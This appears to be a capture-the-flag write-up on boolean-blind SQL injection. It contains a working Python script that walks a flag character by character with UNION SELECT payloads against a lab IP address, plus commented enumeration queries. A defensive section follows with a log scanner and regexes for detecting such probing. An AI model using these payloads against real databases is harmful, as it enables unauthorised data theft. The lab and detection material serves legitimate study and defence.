(Honestly, I have mostly forgotten this by now, orz)
Approach
Based on whether the select returns anything
(The method is much the same as time-based blind injection: one relies on whether the page errors, the other on a time delay)
- Extract the database name length
- Extract the database name
- Extract the table name length
- Extract the table name
- Extract the column name length
- Extract the column names
Implemented in Python
```python
import requests

# Substitute each of the statements below into `id` in turn to enumerate databases, tables and columns
# (as it stands, this code performs the final step: extracting the flag)
#select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
#select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'crf'
#select 1,(select column_name from information_schema.columns where table_schema='ctf' and table_name='ctttf' limit 0,1),3 from ctttf where (select substring(column_name,"+str(i)+",1) from information_schema.columns where TABLE_SCHEMA = 'ctf' and table_name = 'ctttf' limit 0,1)='"+str(j)+"'--+"
url = 'http://120.78.142.81:49496/?id=-1\' union '
string = ''  # characters recovered so far
for i in range(1, 21):          # position within the flag
    for j in range(32, 127):    # printable ASCII candidates for that position
        id = "select 1,(select flag from ctttf limit 0,1),3 from ctttf where (select ascii(substring(flag," + str(i) + ",1)) from information_schema.columns where TABLE_SCHEMA = 'ctf' and table_name = 'ctttf' limit 0,1)='" + str(j) + "'--+"
        #print(id)
        url_get = url + id
        print(url_get)
        r = requests.get(url_get)
        if "You are in" in r.text:   # the "true" page: this character matched
            string += chr(j)
            print(string)
            break
print(string)
```
Nothing much to say? Just watch out for syntax errors.
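As an added defender-side example (not part of the original writeup), the script below scans constructed web-server access-log lines for the request pattern this kind of enumeration leaves behind: one client sending many UNION/SELECT queries that walk `substring(...)` position by position, with the response size flipping between a "true" page and a "false" page. The log lines, client addresses and the `min_probes` threshold are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log shape), not a real capture.
# Host 10.0.0.9 mimics the character-by-character probing done by the script above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=-1%27%20union%20select%201,2,3%20from%20ctttf%20where%20(select%20ascii(substring(flag,1,1))%20from%20ctttf%20limit%200,1)=%2765%27--+ HTTP/1.1" 200 631
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=-1%27%20union%20select%201,2,3%20from%20ctttf%20where%20(select%20ascii(substring(flag,1,1))%20from%20ctttf%20limit%200,1)=%2766%27--+ HTTP/1.1" 200 420
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=-1%27%20union%20select%201,2,3%20from%20ctttf%20where%20(select%20ascii(substring(flag,2,1))%20from%20ctttf%20limit%200,1)=%2765%27--+ HTTP/1.1" 200 420
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=2 HTTP/1.1" 200 500
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+|-)')
# Boolean-blind probes pair UNION/SELECT with a character-extraction function.
PROBE_RE = re.compile(r'\bunion\b.+?\bselect\b.+?\b(?:ascii|substring|substr|mid)\s*\(', re.I | re.S)
# The position argument of substring(col, pos, 1) increments as the string is walked.
POS_RE = re.compile(r'\b(?:substring|substr|mid)\s*\(\s*[\w.]+\s*,\s*(\d+)\s*,\s*1\s*\)', re.I)

def parse_line(line):
    """Return (ip, decoded_path, status, size) or None for a malformed line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, path, status, size = m.groups()
    return ip, unquote_plus(path), int(status), (int(size) if size != "-" else 0)

def analyse(log_text, min_probes=2):
    """Group probe requests per client IP and flag enumeration-like sequences."""
    per_ip = defaultdict(lambda: {"probes": 0, "positions": set(), "sizes": set()})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None or not PROBE_RE.search(parsed[1]):
            continue
        ip, path, _status, size = parsed
        rec = per_ip[ip]
        rec["probes"] += 1
        rec["sizes"].add(size)
        rec["positions"].update(int(p) for p in POS_RE.findall(path))
    # Many probes from one client whose response size flips between exactly two
    # values (true page vs false page) is the signature of boolean-blind extraction.
    return {ip: {"probes": r["probes"], "positions": sorted(r["positions"]),
                 "two_sized": len(r["sizes"]) == 2}
            for ip, r in per_ip.items() if r["probes"] >= min_probes}

if __name__ == "__main__":
    for ip, rec in analyse(SAMPLE_LOG).items():
        print(ip, rec)
```

In production the same grouping would be keyed by client and a short time window, since a real enumeration of a 20-character flag produces hundreds of near-identical requests in minutes.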